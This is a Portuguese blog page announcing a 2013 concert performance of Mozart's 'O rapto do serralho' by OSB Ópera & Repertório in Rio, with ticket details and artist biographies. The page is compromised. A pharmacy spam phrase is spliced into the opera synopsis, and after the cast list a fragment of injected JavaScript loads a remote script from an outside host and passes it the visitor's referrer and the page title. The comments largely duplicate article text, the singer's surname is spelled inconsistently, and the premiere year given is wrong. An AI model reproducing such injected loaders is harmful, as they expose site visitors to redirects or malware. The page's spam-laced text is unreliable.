LateralÓperaProgramaçãoRio de Janeiro

OSB Ópera & Repertório estreia série Ágata com “O rapto do serralho”, de Mozart

Espetáculo terá regência do argentino Alejo Pérez e como solistas Ana James e Gregory Reinhardt

SERVIÇO

 

Theatro Municipal do RJ
Praça Marechal Floriano s/nº, Centro

Informações: (21) 2332‐9191/ 2332‐9005, a partir das 10h.

Quinta-feira, 16 de maio, às 20h.

Ingressos:
Galeria ………………………………………………….. R$    20,00
Balcão superior …………………………………….. R$    60,00
Plateia …………………………………………………… R$ 100,00
Baicão nobre …………………………………………. R$ 140,00
Descontos: 50% para terceira idade, estudantes, portadores de necessidades especiais e menores de 21 anos.

Bilheteria: 2332‐9005 / 2332‐9191

Classificação: Livre

Acesso para cadeirantes  e  pessoas  com  dificuldade  de locomoção  na  entrada  lateral  do Theatro na Avenida Rio Branco.

Há serviço de valet gratuito

 

 

A OSB Ópera & Repertório estreia no dia 16 de maio a série Ágata, no Theatro Municipal. O conjunto de formação clássica apresenta, em versão de concerto, a ópera “O rapto do serralho”, de Mozart. A regência é do maestro argentino Alejo Pérez. A soprano neo-zelandesa Ana James e o baixo americano Gregory Reinhart interpretam, respectivamente, Constanze e Osmin.


A ópera

“O rapto do serralho” é uma ópera de Mozart que estreou em 1781, em Viena. Conta a história de Constanze, uma nobre espanhola raptada por on line pharmacy levitra canada piratas turcos. Junto com o casal Blonde (sua criada inglesa) e Pedrillo, a nobre foi comprada para o harém do Paxá Selim. A ópera começa com a chegada de Belmonte no harém para resgatar a amada, Constanze, e também os seus criados.

 

Alejo Pérez

O argentino Alejo Pérez é maestro convidado e consultor musical do Teatro Real Madrid desde 2010. Ele se apresenta regularmente com a Orquestra Sinfônica de Madri, com destaque para a apresentação de “Rienzi”, de Wagner, e da ópera “Ainadamar”, de Golijov, ambos em 2012. Além disso, o regente é diretor musical do Teatro Argentino de La Plata, uma das mais importantes salas de ópera de seu país.

O maestro tem destaque pela sua interpretação de música contemporânea, e tocou em importantes orquestras, como a Sinfônica de NDR, Sinfônica do Chile, Nacional de Lille, Filarmônica da Radio France, Sinfônica de Taipei, entre outras ao redor do mundo. Nesta temporada, Alejo faz sua estreia no Vienna Konzerthaus e no Teatro dell’Opera di Roma.

 

Ana James

A soprano nascida na cidade de Dunedin, na Nova Zelândia, mora em Londres e trabalha no Royal Opera House, na capital inglesa. Ela fez sua estreia no Royal Opera como Barbarina, de “As bodas de Fígaro”. Ana James foi a primeira ganhadora do prêmio da Fundação Kiri Te Kanawa, que apoia jovens talentos da ópera. Nesta temporada, a cantora se apresenta também em Toulouse, no Opera Project e na BBC Proms.

 

Gregory Reinhardt

O baixo mora em Paris, onde já se apresentou diversas vezes com a Ópera de Paris, em papéis de diversas obras de Cimarosa, Berlioz, Janacek e Strauss. Fez sua estreia com o Metropolitan Opera em “A flauta mágica”, sob regência de James Levine. No ano passado, apresentou-se no Carnegie Hall com a American Symphony Orchestra.

 

Sobre a Fundação OSB

A Fundação Orquestra Sinfônica Brasileira é uma entidade sem fins lucrativos, mantida por captação de recursos privados. Através dela são mantidos dois corpos artísticos – a Orquestra Sinfônica Brasileira (OSB) e a OSB Ópera & Repertório – além de atividades de cunho educacional, orientadas para a formação de público ouvinte de música clássica. As atividades da Fundação OSB são viabilizadas pelo apoio da Vale, da Prefeitura do Rio de Janeiro, do Banco Nacional do Desenvolvimento Econômico e Social (BNDES) e de um conjunto de investidores.

 

Sobre a OSB Ópera & Repertório

A OSB Ópera & Repertório (OSB O&R) é um dos corpos artísticos da Fundação OSB. Atualmente é composta por 36 músicos. A cada apresentação há um regente convidado. A orquestra tem foco em repertório lírico – as óperas são montadas em versão de concerto, sem encenação e figurino – e em música de câmara. No ano de 2013, os músicos vão apresentar duas séries de concerto no Theatro Municipal: Ônix e Ágata. A temporada é elaborada pelo diretor artístico da Fundação, Pablo Castellar, com consultoria de elenco de André Heller-Lopes, e com a comissão de músicos desta orquestra que atua em caráter consultivo.

 

Artistas envolvidos

– Alejo Pérez, regente
– Ana James – Constanze / soprano
– Ivan Maier – Belmonte / tenor
– Lina Mendes – Blonde / soprano
– Gregory Reihardt – Osmin / baixo
– Ivan Jorgensen – Pedrillo / tenor
Solistas do coro
Coro

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; d.getElementsByTagName(‘head’)[0].appendChild(s);

4 Comments

  1. Somando a programação dos quatro corpos artísticos da instituição – OSB, OSB Ópera & Repertório, OSB Jovem e Coro de Crianças da OSB – serão cerca de 90 apresentações e mais de 100 convidados, dentre eles maestros do quilate do norte-americano Andre Previn, pela primeira vez na América do Sul, do regente russo Semyon Bychkov, do maestro do Hollywood Bowl, John Mauceri, da mexicana Alondra de la Parra e de Richard Bonynge, um dos mais celebrados regentes de ópera.

  2. A OSB Ópera & Repertório (OSB O&R) é um dos corpos artísticos da Fundação OSB. Atualmente é composta por 36 músicos. A cada apresentação há um regente convidado. A orquestra tem foco em repertório lírico – as óperas são montadas em versão de concerto, sem encenação e figurino – e em música de câmara. No ano de 2013, os músicos vão apresentar duas séries de concerto no Theatro Municipal: Ônix e Ágata. A temporada é elaborada pelo diretor artístico da Fundação, Pablo Castellar, com consultoria de elenco de André Heller-Lopes, e com a comissão de músicos desta orquestra que atua em caráter consultivo.

  3. Somando a programação dos quatro corpos artísticos da instituição – OSB, OSB Ópera & Repertório, OSB Jovem e Coro de Crianças da OSB – serão cerca de 90 apresentações e mais de 100 convidados, dentre eles maestros do quilate do norte-americano Andre Previn, pela primeira vez na América do Sul, do regente russo Semyon Bychkov, do maestro do Hollywood Bowl, John Mauceri, da mexicana Alondra de la Parra e de Richard Bonynge, um dos mais celebrados regentes de ópera.

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.